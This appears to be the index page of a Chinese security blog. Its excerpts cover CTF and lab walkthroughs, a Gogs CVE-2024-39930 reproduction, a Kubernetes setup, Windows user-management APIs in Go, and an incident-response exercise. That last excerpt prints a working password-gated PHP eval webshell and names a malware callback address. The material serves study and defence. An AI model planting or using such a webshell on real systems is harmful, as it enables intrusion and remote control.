Learn Pwn
声明: 我不会pwn, 也没有任何基础 这是我闲着没事随便找pwn题玩的 所以难免会有一些不准确的知识会误导您 buuctf - pwn - rip再次叠甲 写这题的时候啥也不会 看了一眼栈溢出原理 这这个题目与演示的demo一模一样 所以 比葫芦画瓢 该字符串距离 rbp 的长度为 0xf 那么相应的栈结构为 123456789101112 +-----------------+ | retaddr | <-- 返回地址(return address) +-----------------+ | saved rbp | <-- 保存的基址寄存器(RBP) rbp--->+-----------------+ | | <-- 局部变量 / 临时空间(向低地址) | | | ...
mazesec-Motto
我怕长此以往 都这样 滋长的绝望 在我身上 吧耐心渐渐耗光 我念念不忘 你离开的晚上 多悲伤 特别漫长 一、信息收集主机发现 123456789101112┌──(root㉿kali)-[/home/kali]└─# arp-scan -I eth1 192.168.56.0/24Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission deniedWARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission deniedStarting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:04 (Unknown: locally...
mazesec-Temp
心一跳爱就开始煎熬 每一份每一秒 火在烧烧成灰有多好 叫思念不要吵 我相信我已经快要 快要把你忘掉 跟寂寞再和好 一、信息收集主机发现 12345678910┌──(root㉿kali)-[/usr/bin]└─# arp-scan -I eth1 192.168.56.0/24 Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:04 (Unknown: locally administered)192.168.56.100 08:00:27:6e:db:e2 PCS Systemtechnik...
CVE-2024-39930复现
初见她 漫步溪桥下 她轻摘一朵桃花 满园纯色美如霞 酿得芳菲入新茶 我提笔 月下临摹他 遥遥相思轻放下 宣纸一霎成诗画 眼泪无声 渲染画中的风雅 漏洞描述Gogs(Go Git Service)是GOGS团队的一个基于Go语言的自助Git托管服务,它支持创建、迁移公开/私有仓库,添加、删除仓库协作者等。 Gogs 0.13.0 版本存在安全漏洞,该漏洞源于内置 SSH 服务器允许在 internal/ssh/ssh.go 中注入参数,从而导致远程代码执行。 漏洞分析Gogs的ssh.go中的处理ssh请求代码的部分源码 123456789101112131415161718192021222324for req := range in { payload := cleanCommand(string(req.Payload)) switch req.Type { case "env": var env struct { Name ...
k8s搭建记
有没有那么一首歌会让你轻轻跟着和 牵动我们共同过去记忆它不会沉默 有没有那么一首歌会让你心里记着我 就算日子匆匆过去我们曾走过 安装环境操作系统CentOS 10 master node1 node2 192.168.222.155/24 192.168.222.156/24 192.168.222.157/24 环境准备这里我用MobaXterm连接三台虚拟机 MobaXterm的Multi-execution mode 可以同时操纵三台机器 关闭防火墙与selinux关闭防火墙1systemctl stop firewalld && systemctl disabale firewalld && iptables -F 关闭selinux1sed -i 's/enforcing/disabled/' /etc/selinux/config && setenforce 0 关闭swap分区临时关闭 1swapoff...
mazesec-5ud0
为什么全世界的恋 我都失一遍 为所有的悲剧 当特约演员 我伤得断肠 我哭的夸张 像一套港产片 信息收集主机发现123456789101112┌──(root㉿kali)-[/home/kali]└─# arp-scan -I eth1 192.168.56.0/24Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission deniedWARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission deniedStarting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:04 (Unknown: locally...
Go小记 GoWindows API 探索
0x0 类型速查表类型速查表(C → Go) C 类型 说明 Go 中的对应类型 DWORD 32 位无符号整数 uint32 LPDWORD DWORD*,指向一个 32 位整数的指针 *uint32 LPBYTE* BYTE**,指向缓冲区指针的地址 *uintptr LPCWSTR 常量宽字符字符串(UTF-16)指针 *uint16 或 uintptr(0) PDWORD 与 LPDWORD 类似,指针类型 *uint32 0x1 netapi32.dllnetapi32.dll 是 Windows 操作系统中的一个系统动态链接库,提供了许多网络管理相关的 API,特别是管理网络用户、组、共享资源等。 通过这个 DLL,可以用来编程实现对 Windows 本地或远程计算机上的用户账户、组账户的管理,比如枚举用户、添加用户、删除用户、修改用户属性等。 0x11写些小玩意使用Go的syscall包进行Windows的一些API的调用 syscall包中用syscall.LoadDLL() ...
她不在世界某处,却回应了我
我嫉妒你的爱 气势如虹 像个人气居高不下的天后 前言 · 声音未至,心已动上个月月初,我在先知社区上面看到了一篇文章我的AI女友,作者利用了: ASR、LLM、TTS这三种技术打造了一个”语音互动女友”的过程。文章使用了 SenseVoiceSmall 、 Qwen2.5-0.5B和edge-tts三个模型,展示了如何打造一个简单的”AI女友”的项目 初 · 我在零与一之间,拾起你的名字昨天上午 想起来上个月看的这个 我的AI女友。 也是, 从来没有接触过AI这个玩意。 刚好昨天有时间 可以根据文章中的方法,照着做一下。搞一个玩一玩。最开始我是在魔塔社区上面用魔塔社区提供的Notebook环境 搭建了一下。 不过由于这个环境没有PortAuudio的库 没办法进行音频录制,同时也没办法进行音频的播放🤣 然后我就修改了一下main.py 就调用了TTS模块看了一下 文本转语音的效果 听了一下 感觉效果还不错 然后想起来前段时间刚弄了一个Ubuntu虚拟机 然后就试着在虚拟机里面搞一下这玩意。 然后就开始在虚拟机里面搭建环境搞了 环境搭建到一半 我才想起来...
mazesec-awker
一、信息收集主机发现 123456789101112┌──(root㉿kali)-[/home/kali]└─# arp-scan -I eth1 192.168.56.0/24Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission deniedWARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission deniedStarting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:03 (Unknown: locally administered)192.168.56.100 08:00:27:47:17:7f ...
玄机
做一做玄机、 学一学应急。 做了几个突然想起。博客开个贴子记录下来也是挺好的😋 第一章 应急响应- Linux入侵排查 web目录存在木马,请找到木马的密码提交 登录上服务器,将web目录打包。下载下来用d盾扫一波 1.php内容 .shell.php内容 index.php内容 index.php作用是在 /var/www/html/下生成.shell.php然后在.shell.php中写入<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?> 这个马的密码是hello 网站目录下面还有一个 shell(1).elf 放进ida里面看了一下,发现自己根本看不懂 就起了一个docker 将它在docker里面执行了一下 然后再看网络连接状态netstat -antlp 连接了10.11.55.21:3333